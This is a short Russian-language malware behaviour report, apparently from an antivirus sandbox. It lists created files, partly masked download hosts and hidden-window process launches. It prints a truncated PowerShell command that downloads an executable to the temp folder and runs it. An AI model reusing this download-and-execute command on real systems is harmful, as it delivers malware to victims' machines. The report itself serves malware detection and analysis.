Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- $tsodhcifd как %temp%\ycbkn.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function Kdqrynlpili3([String] $Tsodhcifd){(New-Object System.Net.WebClient).DownloadFile($Tsodhcifd,''%TEMP%\ycbkn.exe'');Start-Process ''%TEMP%\ycbkn.exe'';}try{K...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\kd-uten_tgnp.bat
- %TEMP%\ycbkn.exe
Сетевая активность
Подключается к
- 'ca####delteatro.it':80
- 'rs###tria.com':80
TCP
Запросы HTTP GET
- http://ca####delteatro.it/traur.bin
- http://rs###tria.com/traur.bin
- http://www.rs###tria.com/traur.bin
UDP
- DNS ASK ca####delteatro.it
- DNS ASK rs###tria.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function Kdqrynlpili3([String] $Tsodhcifd){(New-Object System.Net.WebClient).DownloadFile($Tsodhcifd,''%TEMP%\ycbkn.exe'');Start-Process ''%TEMP%\ycbkn.exe'';}try{K...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\Kd-uten_tgnp.bat" "' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\Kd-uten_tgnp.bat" "
